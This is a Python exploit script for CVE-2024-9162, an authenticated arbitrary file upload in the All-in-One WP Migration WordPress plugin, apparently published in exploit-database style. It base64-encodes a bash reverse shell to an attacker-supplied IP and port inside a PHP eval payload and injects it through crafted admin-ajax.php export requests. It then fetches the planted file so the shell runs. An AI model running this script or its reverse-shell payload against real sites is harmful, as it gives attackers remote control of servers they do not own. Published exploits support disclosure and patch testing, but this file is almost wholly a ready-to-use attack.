# Exploit Title: All-in-One WP Migration and Backup <= 7.86 - Authenticated (Administrator+) Arbitrary File Upload
# Date: 09/29/2024
# Exploit Author: Ryan Kozak https://ryankozak.com
# Vendor Homepage:  https://servmask.com/
# Version: <= 7.86
# Tested on: 7.86
# CVE : CVE-2024-9162

import base64
import requests
import argparse
import urllib.parse

def main():
    parser = argparse.ArgumentParser(description="CVE-2024-9162: All-in-One WP Migration and Backup <= 7.86 - Authenticated (Administrator+) Arbitrary File Upload")
    parser.add_argument("victim_url", help="Target url or ip address.")
    parser.add_argument("secret_key", help="The ai1wm_secret_key for the victim site.")
    parser.add_argument("attacker_ip", help="The attacking IP address to catch the shell.")
    parser.add_argument("attacker_port", help="The attacking port listening for the shell.")
    parser.add_argument('-s', '--storage', nargs='?', default='CVE-2024-9162', const='CVE-2024-9162')
    parser.add_argument('-f', '--file', nargs='?',default='CVE-2024-9162.php', const='CVE-2024-9162.php')

    args = parser.parse_args()

    # Reverse shell payload, edit if you'd like something else. 
    payload = f"shell_exec('bash -c \"/bin/bash -i >& /dev/tcp/{args.attacker_ip}/{args.attacker_port} 0>&1 \" 2>/dev/null');"
    payload_bytes = payload.encode("utf-8")
    base64_bytes = base64.b64encode(payload_bytes)
    payload_string = base64_bytes.decode("utf-8")
    payload = f"<?php eval(base64_decode('{payload_string}')); ?>"
    encoded_payload = urllib.parse.quote_plus(payload)

    headers = {'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'}
    
    data =f"action=ai1wm_export&ai1wm_import=1&options%5Breplace%5D%5Bold_value%5D%5B%5D=&options%5Breplace%5D%5Bold_value%5D%5B%5D=*&options%5Breplace%5D%5Bnew_value%5D%5B%5D=&options%5Breplace%5D%5Bnew_value%5D%5B%5D={encoded_payload}&options%5encrypt_password_confirmation%5D=&ai1wm_manual_export=1&storage={args.storage}&file=1&secret_key={args.secret_key}&priority=30&archive={args.file}"
    r = requests.post(f"{args.victim_url}/wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1", headers=headers, data=data, verify=False)
    data =f"action=ai1wm_export&ai1wm_import=1&options%5Breplace%5D%5Bold_value%5D%5B%5D=&options%5Breplace%5D%5Bold_value%5D%5B%5D=*&options%5Breplace%5D%5Bnew_value%5D%5B%5D=&options%5Breplace%5D%5Bnew_value%5D%5B%5D={encoded_payload}&options%5encrypt_password%5D=&options%5Bencrypt_password_confirmation%5D=&ai1wm_manual_export=1&storage={args.storage}&file=1&secret_key={args.secret_key}&priority=50&archive={args.file}"
    r = requests.post(f"{args.victim_url}/wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1", headers=headers, data=data, verify=False)
    data =f"action=ai1wm_export&ai1wm_import=1&options%5Breplace%5D%5Bold_value%5D%5B%5D=&options%5Breplace%5D%5Bold_value%5D%5B%5D=*&options%5Breplace%5D%5Bnew_value%5D%5B%5D=&options%5Breplace%5D%5Bnew_value%5D%5B%5D={encoded_payload}&options%5encrypt_password_confirmation%5D=&ai1wm_manual_export=1&storage={args.storage}&file=1&secret_key={args.secret_key}&priority=60&archive={args.file}"
    r = requests.post(f"{args.victim_url}/wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1", headers=headers, data=data, verify=False)

    print("Triggering the exploit, check your listener...")
    
    r = requests.get(f"{args.victim_url}/wp-content/plugins/all-in-one-wp-migration/storage/{args.storage}/{args.file}", verify=False)
    print(r.content)

if __name__ == "__main__":
    main()